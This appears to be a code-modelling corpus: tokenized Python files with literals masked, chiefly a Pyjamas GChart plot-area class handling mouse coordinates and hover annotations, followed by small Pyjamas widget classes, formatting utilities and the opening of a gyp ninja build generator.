. xMouse = ( Window . getScrollLeft ( ) + clientX - <EOL> self . getAbsoluteLeft ( ) ) <EOL> def getClientY ( self ) : <EOL> return self . clientY <EOL> def setClientY ( self , clientY , isClick ) : <EOL> if clientY <= <NUM_LIT:0> and isClick : <EOL> return <EOL> elif clientY < <NUM_LIT:0> : <EOL> clientY = NAI <EOL> self . clientY = clientY <EOL> if ( NAI == clientY ) : <EOL> self . yMouse = NAI <EOL> else : <EOL> self . yMouse = ( Window . getScrollTop ( ) + clientY - <EOL> self . getAbsoluteTop ( ) ) <EOL> """<STR_LIT>""" <EOL> def repairBadClientX ( self , x ) : <EOL> if x <= <NUM_LIT:0> : <EOL> return self . clientX <EOL> else : <EOL> return x <EOL> def repairBadClientY ( self , y ) : <EOL> if y <= <NUM_LIT:0> : <EOL> return self . clientY <EOL> else : <EOL> return y <EOL> def getXMouse ( self ) : <EOL> return self . xMouse <EOL> def getYMouse ( self ) : <EOL> return self . yMouse <EOL> def getXMousePlotArea ( self ) : <EOL> result = self . xMouse - self . yAxisEnsembleWidth <EOL> return result <EOL> def getYMousePlotArea ( self ) : <EOL> result = self . yMouse - self . topMargin <EOL> return result <EOL> def getXAxisEnsembleHeight ( self ) : <EOL> return self . xAxisEnsembleHeight <EOL> def getXMax ( self ) : <EOL> return self . xMax <EOL> def getXMin ( self ) : <EOL> return self . xMin <EOL> def getY2AxisEnsembleWidth ( self ) : <EOL> return self . y2AxisEnsembleWidth <EOL> def getY2Max ( self ) : <EOL> return self . y2Max <EOL> def getY2Min ( self ) : <EOL> return self . y2Min <EOL> def getYAxisEnsembleWidth ( self ) : <EOL> return self . yAxisEnsembleWidth <EOL> def legendThickness ( self ) : <EOL> return self . chartLegendThickness <EOL> def chartFootnotesThickness ( self ) : <EOL> return self . chartFootnotesThickness <EOL> def chartTitleThickness ( self ) : <EOL> return self . topMargin <EOL> def getYMax ( self ) : <EOL> return self . yMax <EOL> def getYMin ( self ) : <EOL> return self . yMin <EOL> def reset ( self , xChartSize , yChartSize , hasYAxis , hasY2Axis , xAxis , yAxis , y2Axis ) : <EOL> self . chart . getXAxis ( ) . maybePopulateTicks ( ) <EOL> self . chart . getYAxis ( ) . maybePopulateTicks ( ) <EOL> self . chart . getY2Axis ( ) . maybePopulateTicks ( ) <EOL> self . xChartSize = xChartSize <EOL> self . yChartSize = yChartSize <EOL> axisLimits = xAxis . getAxisLimits ( ) <EOL> self . xMin = axisLimits . min <EOL> self . xMax = axisLimits . max <EOL> axisLimits = yAxis . getAxisLimits ( ) <EOL> self . yMin = axisLimits . min <EOL> self . yMax = axisLimits . max <EOL> axisLimits = y2Axis . getAxisLimits ( ) <EOL> self . y2Min = axisLimits . min <EOL> self . y2Max = axisLimits . max <EOL> self . topMargin = self . chart . getChartTitleThickness ( ) <EOL> self . xAxisEnsembleHeight = ( xAxis . getAxisLabelThickness ( ) + <EOL> xAxis . getTickLabelThickness ( False ) + <EOL> xAxis . getTickSpace ( ) + <EOL> xAxis . getTickLabelPadding ( ) ) <EOL> self . yAxisEnsembleWidth = ( yAxis . getAxisLabelThickness ( ) + <EOL> yAxis . getTickLabelThickness ( False ) + <EOL> yAxis . getTickSpace ( ) + <EOL> yAxis . getTickLabelPadding ( ) ) <EOL> self . y2AxisEnsembleWidth = ( y2Axis . getAxisLabelThickness ( ) + <EOL> y2Axis . getTickLabelThickness ( False ) + <EOL> y2Axis . getTickSpace ( ) + <EOL> y2Axis . getTickLabelPadding ( ) ) <EOL> self . chartLegendThickness = self . chart . getLegendThickness ( ) <EOL> self . chartFootnotesThickness = self . chart . getChartFootnotesThickness ( ) <EOL> self . setPixelSize ( self . getXChartSizeDecoratedQuickly ( ) , <EOL> self . getYChartSizeDecoratedQuickly ( ) ) <EOL> self . setWidgetPosition ( self . graphicsPanel , self . yAxisEnsembleWidth , self . topMargin ) <EOL> self . setWidgetPosition ( self . annotationPanel , self . yAxisEnsembleWidth , self . topMargin ) <EOL> for i in range ( self . getRenderingPanelCount ( ) ) : <EOL> grp = self . graphicsPanel . getWidget ( i ) <EOL> if ( DECORATIVE_RENDERING_PANEL_INDEX == i or <EOL> self . chart . isHoverFeedbackRenderingPanel ( i ) or <EOL> not self . chart . getClipToPlotArea ( ) ) : <EOL> grp . setPixelSize ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> GChartUtil . setOverflow ( grp , "<STR_LIT>" ) <EOL> else : <EOL> grp . setPixelSize ( self . getXChartSize ( ) , self . getYChartSize ( ) ) <EOL> GChartUtil . setOverflow ( grp , "<STR_LIT>" ) <EOL> def xToChartPixel ( self , x ) : <EOL> result = Double . NaN <EOL> if - Double . MAX_VALUE == x : <EOL> result = self . yAxisEnsembleWidth <EOL> elif Double . MAX_VALUE == x : <EOL> result = self . yAxisEnsembleWidth + self . xChartSize - <NUM_LIT:1.0> <EOL> elif not ( Double . NaN == ( x ) ) : <EOL> result = ( ( self . yAxisEnsembleWidth * ( self . xMax - x ) + <EOL> ( self . yAxisEnsembleWidth + self . xChartSize - <NUM_LIT:1.0> ) * ( x - self . xMin ) ) / <EOL> ( self . xMax - self . xMin ) ) <EOL> return result <EOL> def xToPixel ( self , x ) : <EOL> result = Double . NaN <EOL> if - Double . MAX_VALUE == x : <EOL> result = <NUM_LIT:0> <EOL> elif Double . MAX_VALUE == x : <EOL> result = self . xChartSize - <NUM_LIT:1.0> <EOL> elif not ( Double . NaN == ( x ) ) : <EOL> result = ( self . xChartSize - <NUM_LIT:1.0> ) * ( x - self . xMin ) / ( self . xMax - self . xMin ) <EOL> return result <EOL> def xChartPixelToX ( self , xPx ) : <EOL> result = Double . NaN <EOL> if NAI != xPx and self . xChartSize > <NUM_LIT:1> : <EOL> result = ( self . xMin + ( self . xMax - self . xMin ) * <EOL> ( xPx - self . yAxisEnsembleWidth ) / ( self . xChartSize - <NUM_LIT:1.> ) ) <EOL> return result <EOL> def xPixelToX ( self , xPx ) : <EOL> result = Double . NaN <EOL> if NAI != xPx and self . xChartSize > <NUM_LIT:1> : <EOL> result = self . xMin + ( self . xMax - self . xMin ) * xPx / ( self . xChartSize - <NUM_LIT:1.> ) <EOL> return result <EOL> def dxToPixel ( self , dx ) : <EOL> result = ( dx * ( self . xChartSize - <NUM_LIT:1> ) ) / ( self . xMax - self . xMin ) <EOL> return result <EOL> def yToChartPixel ( self , y , isY2 ) : <EOL> if isY2 : <EOL> minY = self . y2Min <EOL> maxY = self . y2Max <EOL> else : <EOL> minY = self . yMin <EOL> maxY = self . yMax <EOL> result = Double . NaN <EOL> if - Double . MAX_VALUE == y : <EOL> result = self . yChartSize + self . topMargin - <NUM_LIT:1.0> <EOL> elif Double . MAX_VALUE == y : <EOL> result = self . topMargin <EOL> elif not ( Double . NaN == ( y ) ) : <EOL> result = ( self . topMargin * ( y - minY ) + <EOL> ( ( self . yChartSize + self . topMargin - <NUM_LIT:1.0> ) * <EOL> ( maxY - y ) ) ) / ( maxY - minY ) <EOL> return result <EOL> def yToPixel ( self , y , isY2 ) : <EOL> if isY2 : <EOL> minY = self . y2Min <EOL> maxY = self . y2Max <EOL> else : <EOL> minY = self . yMin <EOL> maxY = self . yMax <EOL> result = Double . NaN <EOL> if - Double . MAX_VALUE == y : <EOL> result = self . yChartSize - <NUM_LIT:1.0> <EOL> elif Double . MAX_VALUE == y : <EOL> result = <NUM_LIT:0> <EOL> elif not ( Double . NaN == ( y ) ) : <EOL> result = ( self . yChartSize - <NUM_LIT:1.0> ) * ( maxY - y ) / ( maxY - minY ) <EOL> return result <EOL> def yChartPixelToY ( self , yPx ) : <EOL> result = Double . NaN <EOL> if NAI != yPx and self . yChartSize > <NUM_LIT:1> : <EOL> result = self . yMax + ( self . yMin - self . yMax ) * ( yPx - self . topMargin ) / ( self . yChartSize - <NUM_LIT:1.> ) <EOL> return result <EOL> def yPixelToY ( self , yPx ) : <EOL> result = Double . NaN <EOL> if NAI != yPx and self . yChartSize > <NUM_LIT:1> : <EOL> result = self . yMax + ( self . yMin - self . yMax ) * yPx / ( self . yChartSize - <NUM_LIT:1.> ) <EOL> return result <EOL> def yChartPixelToY2 ( self , yPx ) : <EOL> result = Double . NaN <EOL> if NAI != yPx and self . yChartSize > <NUM_LIT:1> : <EOL> result = self . y2Max + ( self . y2Min - self . y2Max ) * ( yPx - self . topMargin ) / ( self . yChartSize - <NUM_LIT:1.> ) <EOL> return result <EOL> def yPixelToY2 ( self , yPx ) : <EOL> result = Double . NaN <EOL> if NAI != yPx and self . yChartSize > <NUM_LIT:1> : <EOL> result = self . y2Max + ( self . y2Min - self . y2Max ) * yPx / ( self . yChartSize - <NUM_LIT:1.> ) <EOL> return result <EOL> def dyToPixel ( self , dy , isY2 ) : <EOL> if isY2 : <EOL> minY = self . y2Min <EOL> maxY = self . y2Max <EOL> else : <EOL> minY = self . yMin <EOL> maxY = self . yMax <EOL> result = ( dy * ( self . yChartSize - <NUM_LIT:1> ) ) / ( maxY - minY ) <EOL> return result <EOL> def getOpenedHoverContainer ( self ) : <EOL> result = None <EOL> c = self . chart . getSystemCurve ( HOVER_ANNOTATION_ID ) <EOL> if self . touchedPoint is not None and c . isVisible ( ) : <EOL> internalIndex = self . chart . getInternalCurveIndex ( c ) <EOL> rpIndex = self . chart . getRenderingPanelIndex ( internalIndex ) <EOL> arp = self . getAnnotationRenderingPanel ( rpIndex ) <EOL> result = arp . getFirstInnerAlignedLabel ( ) <EOL> return result <EOL> def getOpenedHoverElement ( self ) : <EOL> hoverContainer = self . getOpenedHoverContainer ( ) <EOL> return hoverContainer and hoverContainer . getElement ( ) or None <EOL> """<STR_LIT>""" <EOL> def touch ( self , p ) : <EOL> prevTouchedPoint = self . touchedPoint <EOL> self . touchedPoint = p <EOL> cAnnotation = self . chart . getSystemCurve ( HOVER_ANNOTATION_ID ) <EOL> cCursor = self . chart . getSystemCurve ( HOVER_CURSOR_ID ) <EOL> cTouched = p and p . getParent ( ) or None <EOL> if None != self . touchedHoverWidget : <EOL> if not self . insideHoverCleanup : <EOL> try : <EOL> self . insideHoverCleanup = True <EOL> self . touchedHoverWidget . hoverCleanup ( prevTouchedPoint ) <EOL> except : <EOL> pass <EOL> self . insideHoverCleanup = False <EOL> self . touchedHoverWidget = cTouched and cTouched . getSymbol ( ) . getHoverWidget ( ) or None <EOL> if None == self . touchedHoverWidget : <EOL> if None != p : <EOL> hovertext = p . getHovertext ( ) <EOL> cAnnotation . getPoint ( <NUM_LIT:0> ) . setAnnotationText ( hovertext , <EOL> cTouched . getSymbol ( ) . getHoverAnnotation ( ) . widthUpperBound , <EOL> cTouched . getSymbol ( ) . getHoverAnnotation ( ) . heightUpperBound ) <EOL> else : <EOL> if not self . insideHoverUpdate : <EOL> try : <EOL> self . insideHoverUpdate = True <EOL> self . touchedHoverWidget . hoverUpdate ( p ) <EOL> except : <EOL> pass <EOL> self . insideHoverUpdate = False <EOL> cAnnotation . getPoint ( <NUM_LIT:0> ) . setAnnotationWidget ( <EOL> self . touchedHoverWidget , <EOL> cTouched . getSymbol ( ) . getHoverAnnotation ( ) . widthUpperBound , <EOL> cTouched . getSymbol ( ) . getHoverAnnotation ( ) . heightUpperBound ) <EOL> if None == p : <EOL> cAnnotation . setVisible ( False ) <EOL> cCursor . setVisible ( False ) <EOL> else : <EOL> if not cTouched . getSymbol ( ) . getHoverAnnotationEnabled ( ) : <EOL> cAnnotation . setVisible ( False ) <EOL> else : <EOL> cAnnotation . setVisible ( True ) <EOL> cAnnotation . setYAxis ( cTouched . getYAxis ( ) ) <EOL> cAnnotation . getPoint ( <NUM_LIT:0> ) . setX ( p . getX ( ) ) <EOL> cAnnotation . getPoint ( <NUM_LIT:0> ) . setY ( p . getY ( ) ) <EOL> cAnnotation . getSymbol ( ) . copy ( cTouched . getSymbol ( ) ) <EOL> cAnnotation . getSymbol ( ) . setImageURL ( <EOL> DEFAULT_BLANK_IMAGE_URL_FULLPATH ) <EOL> cAnnotation . getSymbol ( ) . setBackgroundColor ( "<STR_LIT>" ) <EOL> cAnnotation . getSymbol ( ) . setBorderColor ( TRANSPARENT_BORDER_COLOR ) <EOL> if None != cTouched . getSymbol ( ) . getHoverAnnotationSymbolType ( ) : <EOL> cAnnotation . getSymbol ( ) . setSymbolType ( <EOL> cTouched . getSymbol ( ) . getHoverAnnotationSymbolType ( ) ) <EOL> cAnnotation . getPoint ( <NUM_LIT:0> ) . setAnnotationFontColor ( <EOL> cTouched . getSymbol ( ) . getHoverFontColor ( ) ) <EOL> cAnnotation . getPoint ( <NUM_LIT:0> ) . setAnnotationFontSize ( <EOL> cTouched . getSymbol ( ) . getHoverFontSize ( ) ) <EOL> cAnnotation . getPoint ( <NUM_LIT:0> ) . setAnnotationFontStyle ( <EOL> cTouched . getSymbol ( ) . getHoverFontStyle ( ) ) <EOL> cAnnotation . getPoint ( <NUM_LIT:0> ) . setAnnotationFontWeight ( <EOL> cTouched . getSymbol ( ) . getHoverFontWeight ( ) ) <EOL> cAnnotation . getPoint ( <NUM_LIT:0> ) . setAnnotationLocation ( <EOL> cTouched . getSymbol ( ) . getHoverLocation ( ) ) <EOL> cAnnotation . getPoint ( <NUM_LIT:0> ) . setAnnotationXShift ( <EOL> cTouched . getSymbol ( ) . getHoverXShift ( ) ) <EOL> cAnnotation . getPoint ( <NUM_LIT:0> ) . setAnnotationYShift ( <EOL> cTouched . getSymbol ( ) . getHoverYShift ( ) ) <EOL> if not cTouched . getSymbol ( ) . getHoverSelectionEnabled ( ) : <EOL> cCursor . setVisible ( False ) <EOL> else : <EOL> cCursor . setVisible ( True ) <EOL> cCursor . setYAxis ( cTouched . getYAxis ( ) ) <EOL> cCursor . getPoint ( <NUM_LIT:0> ) . setX ( p . getX ( ) ) <EOL> cCursor . getPoint ( <NUM_LIT:0> ) . setY ( p . getY ( ) ) <EOL> cCursor . getSymbol ( ) . copy ( cTouched . getSymbol ( ) ) <EOL> if None != cTouched . getSymbol ( ) . getHoverSelectionSymbolType ( ) : <EOL> cCursor . getSymbol ( ) . setSymbolType ( <EOL> cTouched . getSymbol ( ) . getHoverSelectionSymbolType ( ) ) <EOL> fillSpacing = cTouched . getSymbol ( ) . getHoverSelectionFillSpacing ( ) <EOL> if not ( Double . NaN == ( fillSpacing ) ) : <EOL> cCursor . getSymbol ( ) . setFillSpacing ( fillSpacing ) <EOL> fillThickness = cTouched . getSymbol ( ) . getHoverSelectionFillThickness ( ) <EOL> if NAI != fillThickness : <EOL> cCursor . getSymbol ( ) . setFillThickness ( fillThickness ) <EOL> if NAI != cTouched . getSymbol ( ) . getHoverSelectionHeight ( ) : <EOL> cCursor . getSymbol ( ) . setHeight ( <EOL> cTouched . getSymbol ( ) . getHoverSelectionHeight ( ) ) <EOL> if NAI != cTouched . getSymbol ( ) . getHoverSelectionWidth ( ) : <EOL> cCursor . getSymbol ( ) . setWidth ( <EOL> cTouched . getSymbol ( ) . getHoverSelectionWidth ( ) ) <EOL> cCursor . getSymbol ( ) . setImageURL ( <EOL> cTouched . getSymbol ( ) . getHoverSelectionImageURL ( ) ) <EOL> cCursor . getSymbol ( ) . setBackgroundColor ( <EOL> cTouched . getSymbol ( ) . getHoverSelectionBackgroundColor ( ) ) <EOL> cCursor . getSymbol ( ) . setBorderColor ( <EOL> cTouched . getSymbol ( ) . getHoverSelectionBorderColor ( ) ) <EOL> cCursor . getSymbol ( ) . setBorderStyle ( <EOL> cTouched . getSymbol ( ) . getHoverSelectionBorderStyle ( ) ) <EOL> borderWidth = cTouched . getSymbol ( ) . getHoverSelectionBorderWidth ( ) <EOL> cCursor . getSymbol ( ) . setBorderWidth ( borderWidth ) <EOL> """<STR_LIT>""" <EOL> def isContainedIn ( self , container , et ) : <EOL> if container is None : <EOL> return False <EOL> return DOM . isOrHasChild ( et , container ) <EOL> part = et <EOL> """<STR_LIT>""" <EOL> if None == part : <EOL> return True <EOL> try : <EOL> ancestor = part <EOL> while ancestor is not None and container is not None : <EOL> if DOM . isSameNode ( container , ancestor ) : <EOL> return True <EOL> ancestor = ancestor . getParentElement ( ) <EOL> except : <EOL> """<STR_LIT>""" <EOL> return True <EOL> return False <EOL> """<STR_LIT>""" <EOL> def isGeometricallyContainedIn ( self , container , clientX , clientY ) : <EOL> if None == container : <EOL> raise IllegalArgumentException ( "<STR_LIT>" ) <EOL> result = False <EOL> """<STR_LIT>""" <EOL> y = Window . getScrollTop ( ) + self . repairBadClientY ( clientY ) <EOL> absTop = DOM . getAbsoluteTop ( container ) <EOL> if absTop < y and y + <NUM_LIT:1> < absTop + DOM . getOffsetHeight ( container ) : <EOL> x = Window . getScrollLeft ( ) + self . repairBadClientX ( clientX ) <EOL> absLeft = DOM . getAbsoluteLeft ( container ) <EOL> if absLeft < x and x + <NUM_LIT:1> < absLeft + DOM . getOffsetWidth ( container ) : <EOL> result = True <EOL> return result <EOL> def touchObjectAtMousePosition ( self , retouch = False ) : <EOL> result = False <EOL> pointAtPosition = self . chart . getClosestBrushTouchingPointNoCheck ( <EOL> self . getXMousePlotArea ( ) , self . getYMousePlotArea ( ) ) <EOL> if ( pointAtPosition != self . touchedPoint ) or retouch : <EOL> self . touch ( pointAtPosition ) <EOL> result = True <EOL> return result <EOL> def retouchObjectAtMousePosition ( self ) : <EOL> self . touchObjectAtMousePosition ( True ) <EOL> """<STR_LIT>""" <EOL> def isOverOpenedHoverAnnotation ( self , event ) : <EOL> result = False <EOL> hoverElement = self . getOpenedHoverElement ( ) <EOL> if None != hoverElement : <EOL> if self . isContainedIn ( hoverElement , DOM . eventGetTarget ( event ) ) : <EOL> result = True <EOL> elif self . isGeometricallyContainedIn ( hoverElement , <EOL> DOM . eventGetClientX ( event ) , <EOL> DOM . eventGetClientY ( event ) ) : <EOL> result = True <EOL> return result <EOL> """<STR_LIT>""" <EOL> def takesUsCompletelyOutsideChart ( self , event ) : <EOL> result = True <EOL> if self . isContainedIn ( self . getElement ( ) , DOM . eventGetToElement ( event ) ) : <EOL> """<STR_LIT>""" <EOL> result = False <EOL> elif self . isGeometricallyContainedIn ( self . getElement ( ) , <EOL> DOM . eventGetClientX ( event ) , <EOL> DOM . eventGetClientY ( event ) ) : <EOL> result = False <EOL> else : <EOL> hoverElement = self . getOpenedHoverElement ( ) <EOL> if None != hoverElement : <EOL> if self . isGeometricallyContainedIn ( hoverElement , <EOL> DOM . eventGetClientX ( event ) , <EOL> DOM . eventGetClientY ( event ) ) : <EOL> result = False <EOL> return result <EOL> """<STR_LIT>""" <EOL> def onBrowserEvent ( self , event ) : <EOL> AbsolutePanel . onBrowserEvent ( self , event ) <EOL> """<STR_LIT>""" <EOL> eventId = DOM . eventGetType ( event ) <EOL> """<STR_LIT>""" <EOL> isClick = ( "<STR_LIT>" == eventId ) <EOL> if ( "<STR_LIT>" == eventId or "<STR_LIT>" == eventId or isClick ) and not self . isOverOpenedHoverAnnotation ( event ) : <EOL> """<STR_LIT>""" <EOL> if self . chart . getHoverTouchingEnabled ( ) or isClick : <EOL> self . setClientX ( DOM . eventGetClientX ( event ) , isClick ) <EOL> self . setClientY ( DOM . eventGetClientY ( event ) , isClick ) <EOL> if ( not self . chart . isUpdateNeeded ( ) and <EOL> self . touchObjectAtMousePosition ( isClick ) ) : <EOL> self . chart . assembleChart ( ) <EOL> elif "<STR_LIT>" == eventId and self . chart . getHoverTouchingEnabled ( ) and self . takesUsCompletelyOutsideChart ( event ) : <EOL> """<STR_LIT>""" <EOL> self . setClientX ( NAI , False ) ; <EOL> self . setClientY ( NAI , False ) ; <EOL> if ( not self . chart . isUpdateNeeded ( ) and <EOL> self . touchObjectAtMousePosition ( ) ) : <EOL> self . chart . assembleChart ( ) <EOL> def isValidated ( self ) : <EOL> result = True <EOL> i = <NUM_LIT:0> <EOL> while result and i < len ( self . chart . curves ) : <EOL> result = self . chart . curves [ i ] . isValidated ( ) <EOL> i += <NUM_LIT:1> <EOL> return result <EOL> """<STR_LIT>""" <EOL> def getRenderingPanelCount ( self ) : <EOL> result = self . graphicsPanel . getWidgetCount ( ) <EOL> return result <EOL> def getXChartSize ( self ) : <EOL> return self . xChartSize <EOL> def getYChartSize ( self ) : <EOL> return self . yChartSize <EOL> def getXChartSizeDecoratedQuickly ( self ) : <EOL> result = ( self . xChartSize + <EOL> self . yAxisEnsembleWidth + <EOL> self . y2AxisEnsembleWidth + <EOL> self . chartLegendThickness ) <EOL> return result <EOL> def getYChartSizeDecoratedQuickly ( self ) : <EOL> result = ( self . yChartSize + <EOL> self . xAxisEnsembleHeight + <EOL> self . topMargin + <EOL> self . chartFootnotesThickness ) <EOL> return result </s>
<s> """<STR_LIT>""" <EOL> from pyjamas . media . Media import Media <EOL> from pyjamas import DOM <EOL> """<STR_LIT>""" <EOL> class Audio ( Media ) : <EOL> def __init__ ( self , src = None , ** kwargs ) : <EOL> self . setElement ( DOM . createElement ( "<STR_LIT>" ) ) <EOL> if src : <EOL> self . setSrc ( src ) <EOL> Media . __init__ ( self , ** kwargs ) </s>
<s> from pyjamas import DOM <EOL> from pyjamas . ui import Event <EOL> def fireChangeEvent ( listeners , sender , event ) : <EOL> etype = DOM . eventGetType ( event ) <EOL> if etype != "<STR_LIT>" : <EOL> return <EOL> for listener in listeners : <EOL> if hasattr ( listener , '<STR_LIT>' ) : <EOL> listener . onChange ( sender ) <EOL> else : <EOL> listener ( sender ) <EOL> class ChangeHandler ( object ) : <EOL> def __init__ ( self ) : <EOL> self . _changeListeners = [ ] <EOL> self . sinkEvents ( Event . ONCHANGE ) <EOL> def onBrowserEvent ( self , event ) : <EOL> etype = DOM . eventGetType ( event ) <EOL> if etype == '<STR_LIT>' : <EOL> fireChangeEvent ( self . _changeListeners , self , event ) <EOL> def addChangeListener ( self , listener ) : <EOL> self . _changeListeners . append ( listener ) <EOL> def removeChangeListener ( self , listener ) : <EOL> self . _changeListeners . remove ( listener ) <EOL> def onChange ( self , sender ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from pyjamas . ui . SplitPanel import SplitPanel <EOL> from pyjamas import Factory <EOL> class HorizontalSplitPanel ( SplitPanel ) : <EOL> def __init__ ( self , ** kwargs ) : <EOL> SplitPanel . __init__ ( self , vertical = False , ** kwargs ) <EOL> def setLeftWidget ( self , leftWidget ) : <EOL> self . setWidget ( <NUM_LIT:0> , leftWidget ) <EOL> def getLeftWidget ( self ) : <EOL> return self . getWidget ( <NUM_LIT:0> ) <EOL> def setRightWidget ( self , rightWidget ) : <EOL> self . setWidget ( <NUM_LIT:1> , rightWidget ) <EOL> def getRightWidget ( self ) : <EOL> return self . getWidget ( <NUM_LIT:1> ) <EOL> Factory . registerClass ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> HorizontalSplitPanel ) </s>
<s> class TextArea : <EOL> def getCursorPos ( self ) : <EOL> JS ( """<STR_LIT>""" ) </s>
<s> import DOM <EOL> class UIObject : <EOL> def getElement ( self ) : <EOL> return self . element <EOL> def setElement ( self , element ) : <EOL> self . element = element <EOL> def setStyleName ( self , style ) : <EOL> DOM . setAttribute ( self . element , "<STR_LIT>" , style ) <EOL> class Widget ( UIObject ) : <EOL> def setParent ( self , parent ) : <EOL> self . parent = parent <EOL> class Panel ( Widget ) : <EOL> pass <EOL> class ComplexPanel ( Panel ) : <EOL> def __init__ ( self ) : <EOL> self . children = [ ] <EOL> def add ( self , widget ) : <EOL> self . children . append ( widget ) <EOL> widget . setParent ( self ) <EOL> return True <EOL> class AbsolutePanel ( ComplexPanel ) : <EOL> def __init__ ( self ) : <EOL> ComplexPanel . __init__ ( self ) <EOL> self . setElement ( DOM . createDiv ( ) ) <EOL> DOM . setStyleAttribute ( self . getElement ( ) , "<STR_LIT>" , "<STR_LIT>" ) <EOL> def add ( self , widget ) : <EOL> ComplexPanel . add ( self , widget ) <EOL> DOM . appendChild ( self . getElement ( ) , widget . getElement ( ) ) <EOL> return True <EOL> class RootPanel ( AbsolutePanel ) : <EOL> def __init__ ( self ) : <EOL> AbsolutePanel . __init__ ( self ) <EOL> element = self . getBodyElement ( ) <EOL> self . setElement ( element ) <EOL> def getBodyElement ( self ) : <EOL> JS ( """<STR_LIT>""" ) </s>
<s> """<STR_LIT>""" <EOL> def safe_repr ( obj , clip = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> s = repr ( obj ) <EOL> if not clip or len ( s ) <= clip : <EOL> return s <EOL> else : <EOL> return s [ : clip - <NUM_LIT:4> ] + '<STR_LIT:..>' + s [ - <NUM_LIT:2> : ] <EOL> except : <EOL> return '<STR_LIT>' <EOL> def trunc ( obj , max , left = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> s = str ( obj ) <EOL> s = s . replace ( '<STR_LIT:\n>' , '<STR_LIT:|>' ) <EOL> if len ( s ) > max : <EOL> if left : <EOL> return '<STR_LIT>' + s [ len ( s ) - max + <NUM_LIT:3> : ] <EOL> else : <EOL> return s [ : ( max - <NUM_LIT:3> ) ] + '<STR_LIT>' <EOL> else : <EOL> return s <EOL> def pp ( i , base = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> degree = <NUM_LIT:0> <EOL> pattern = "<STR_LIT>" <EOL> while i > base : <EOL> pattern = "<STR_LIT>" <EOL> i = i / float ( base ) <EOL> degree += <NUM_LIT:1> <EOL> scales = [ '<STR_LIT:B>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> return pattern % ( i , scales [ degree ] ) <EOL> def pp_timestamp ( t ) : <EOL> """<STR_LIT>""" <EOL> if t is None : <EOL> return '<STR_LIT>' <EOL> h , m , s = int ( t / <NUM_LIT> ) , int ( t / <NUM_LIT> % <NUM_LIT> ) , t % <NUM_LIT> <EOL> return "<STR_LIT>" % ( h , m , s ) </s>
<s> from __future__ import print_function <EOL> import collections <EOL> import copy <EOL> import hashlib <EOL> import json <EOL> import multiprocessing <EOL> import os . path <EOL> import re <EOL> import signal <EOL> import subprocess <EOL> import sys <EOL> import gyp <EOL> import gyp . common <EOL> from gyp . common import OrderedSet <EOL> import gyp . msvs_emulation <EOL> import gyp . MSVSUtil as MSVSUtil <EOL> import gyp . xcode_emulation <EOL> import os <EOL> _PYTHON3 = sys . version_info >= ( <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> if _PYTHON3 : <EOL> from io import StringIO <EOL> else : <EOL> from cStringIO import StringIO <EOL> from gyp . common import GetEnvironFallback <EOL> import gyp . ninja_syntax as ninja_syntax <EOL> generator_default_variables = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> generator_additional_non_configuration_keys = [ ] <EOL> generator_additional_path_sections = [ ] <EOL> generator_extra_sources_for_rules = [ ] <EOL> generator_filelist_paths = None <EOL> generator_supports_multiple_toolsets = ( <EOL> os . environ . get ( '<STR_LIT>' ) or <EOL> os . environ . get ( '<STR_LIT>' ) or <EOL> os . environ . get ( '<STR_LIT>' ) or <EOL> os . environ . get ( '<STR_LIT>' ) or <EOL> os . environ . get ( '<STR_LIT>' ) or <EOL> os . environ . get ( '<STR_LIT>' ) or <EOL> os . environ . get ( '<STR_LIT>' ) ) <EOL> def StripPrefix ( arg , prefix ) : <EOL> if arg . startswith ( prefix ) : <EOL> return arg [ len ( prefix ) : ] <EOL> return arg <EOL> def QuoteShellArgument ( arg , flavor ) : <EOL> """<STR_LIT>""" <EOL> if re . match ( r'<STR_LIT>' , arg ) : <EOL> return arg <EOL> if flavor == '<STR_LIT>' : <EOL> return gyp . msvs_emulation . QuoteForRspFile ( arg ) <EOL> return "<STR_LIT:'>" + arg . replace ( "<STR_LIT:'>" , "<STR_LIT:'>" + '<STR_LIT>' + "<STR_LIT:'>" ) + "<STR_LIT:'>" <EOL> def Define ( d , flavor ) : <EOL> """<STR_LIT>""" <EOL> if flavor == '<STR_LIT>' : <EOL> d = d . replace ( '<STR_LIT:#>' , '<STR_LIT>' % ord ( '<STR_LIT:#>' ) ) <EOL> return QuoteShellArgument ( ninja_syntax . escape ( '<STR_LIT>' + d ) , flavor ) <EOL> def AddArch ( output , arch ) : <EOL> """<STR_LIT>""" <EOL> output , extension = os . path . splitext ( output ) <EOL> return '<STR_LIT>' % ( output , arch , extension ) <EOL> class Target ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , type ) : <EOL> self . type = type <EOL> self . preaction_stamp = None <EOL> self . precompile_stamp = None <EOL> self . actions_stamp = None <EOL> self . binary = None <EOL> self . bundle = None <EOL> self . component_objs = None <EOL> self . import_lib = None <EOL> def Linkable ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . type in ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def UsesToc ( self , flavor ) : <EOL> """<STR_LIT>""" <EOL> if flavor == '<STR_LIT>' or self . bundle : <EOL> return False <EOL> return self . type in ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def PreActionInput ( self , flavor ) : <EOL> """<STR_LIT>""" <EOL> if self . UsesToc ( flavor ) : <EOL> return self . FinalOutput ( ) + '<STR_LIT>' <EOL> return self . 